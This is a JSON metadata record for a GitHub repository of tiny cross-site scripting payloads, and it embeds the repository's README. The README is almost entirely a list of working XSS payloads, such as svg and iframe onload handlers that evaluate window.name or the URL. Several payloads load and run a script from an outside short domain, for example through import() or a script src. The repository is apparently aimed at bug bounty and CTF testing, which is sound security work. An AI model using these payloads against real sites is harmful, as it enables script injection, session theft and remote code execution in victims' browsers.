{"id":15028315,"url":"https://github.com/terjanq/tiny-xss-payloads","last_synced_at":"2025-04-13T19:18:46.230Z","repository":{"id":42476357,"uuid":"278477488","full_name":"terjanq/Tiny-XSS-Payloads","owner":"terjanq","description":"A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me","archived":false,"fork":false,"pushed_at":"2024-11-29T23:58:23.000Z","size":633,"stargazers_count":2071,"open_issues_count":0,"forks_count":204,"subscribers_count":49,"default_branch":"master","last_synced_at":"2025-04-06T17:01:34.295Z","etag":null,"topics":["bugbounty","ctf","html","javascript","payloads","xss"],"latest_commit_sha":null,"homepage":"https://tinyxss.terjanq.me/","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/terjanq.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-07-09T21:45:19.000Z","updated_at":"2025-04-05T19:17:58.000Z","dependencies_parsed_at":"2025-01-19T03:50:58.337Z","dependency_job_id":"ef3f1d46-65ef-48ca-8bc7-8b603fcf6d4c","html_url":"https://github.com/terjanq/Tiny-XSS-Payloads","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/terjanq","download_url":"https://codeload.github.com/terjanq/Tiny-XSS-Payloads/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248766724,"owners_count":21158302,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","ctf","html","javascript","payloads","xss"],"created_at":"2024-09-24T20:08:00.522Z","updated_at":"2025-04-13T19:18:46.208Z","avatar_url":"https://github.com/terjanq.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Tiny-XSS-Payloads\nA collection of short XSS payloads that can be used in different contexts.\n\nThe DEMO is available here: \u003chttps://tinyxss.terjanq.me\u003e\n\n\n## Current Payloads\n\n```html\n\u003c!-- Requires a relative script inserted to the DOM after the sink, \n  e.g. \u003cbase/href=//Ǌ.₨\u003e ... \u003cscript src=/aaa\u003e\u003c/script\u003e --\u003e\n\u003cbase/href=//Ǌ.₨\u003e\n```\n\n```html\n\u003c!-- Only works as reflected XSS --\u003e\n\u003csvg/onload=eval(name)\u003e\n```\n\n```html\n\u003c!-- If you control the URL --\u003e\n\u003csvg/onload=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- If you control the name, but unsafe-eval not enabled --\u003e\n\u003csvg/onload=location=name\u003e\n```\n\n```html\n\u003c!-- In Chrome, also works inside innerHTML, even on elements not yet inserted into DOM --\u003e\n\u003csvg\u003e\u003csvg/onload=eval(name)\u003e\n```\n\n```html\n\u003c!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --\u003e\n\u003caudio/src/onerror=eval(name)\u003e\n```\n\n```html\n\u003c!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --\u003e\n\u003cimg/src/onerror=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- Just a casual script --\u003e\n\u003cscript/src=//Ǌ.₨\u003e\u003c/script\u003e\n```\n\n```html\n\u003c!-- If you control the name of the window --\u003e\n\u003ciframe/onload=src=top.name\u003e\n```\n\n```html\n\u003c!-- If you control the URL --\u003e\n\u003ciframe/onload=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- If number of iframes on the page is constant --\u003e\n\u003ciframe/onload=src=top[0].name+/\\Ǌ.₨?/\u003e\n```\n\n```html\n\u003c!-- for Firefox only --\u003e\n\u003ciframe/srcdoc=\"\u003csvg\u003e\u003cscript/href=//Ǌ.₨ /\u003e\"\u003e\n```\n\n```html\n\u003c!-- If number of iframes on the page is random --\u003e\n\u003ciframe/onload=src=contentWindow.name+/\\Ǌ.₨?/\u003e\n```\n\n```html\n\u003c!-- If unsafe-inline is disabled in CSP and external scripts allowed --\u003e\n\u003ciframe/srcdoc=\"\u003cscript/src=//Ǌ.₨\u003e\u003c/script\u003e\"\u003e\n```\n\n```html\n\u003c!-- If inline styles are allowed --\u003e\n\u003cstyle/onload=eval(name)\u003e\n```\n\n```html\n\u003c!-- If inline styles are allowed and the URL can be controlled --\u003e\n\u003cstyle/onload=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- If inline styles are blocked --\u003e\n\u003cstyle/onerror=eval(name)\u003e\n```\n\n```html\n\u003c!-- Uses external script as import, doesn't work in innerHTML --\u003e\n\u003c!-- The PoC only works on https and Chrome, because Ǌ.₨ checks for Sec-Fetch-Dest header --\u003e\n\u003csvg/onload=import(/\\\\Ǌ.₨/)\u003e\n```\n\n```html\n\u003c!-- Uses external script as import, triggers if inline styles are allowed. --\u003e\n\u003c!-- The PoC only works on https and Chrome, because Ǌ.₨ checks for Sec-Fetch-Dest header --\u003e\n\u003cstyle/onload=import(/\\\\Ǌ.₨/)\u003e\n```\n\n```html\n\u003c!-- Uses external script as import --\u003e\n\u003c!-- The PoC only works on https and Chrome, because Ǌ.₨ checks for Sec-Fetch-Dest header --\u003e\n\u003ciframe/onload=import(/\\\\Ǌ.₨/)\u003e\n```\n\nDeprecated:\n\n```html\n\u003c!-- If you control the URL, Safari-only --\u003e\n\u003ciframe/onload=write(URL)\u003e\n```\n\n```html\n\u003c!-- If inline styles are allowed, Safari only --\u003e\n\u003cstyle/onload=write(URL)\u003e\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fterjanq%2Ftiny-xss-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fterjanq%2Ftiny-xss-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fterjanq%2Ftiny-xss-payloads/lists"}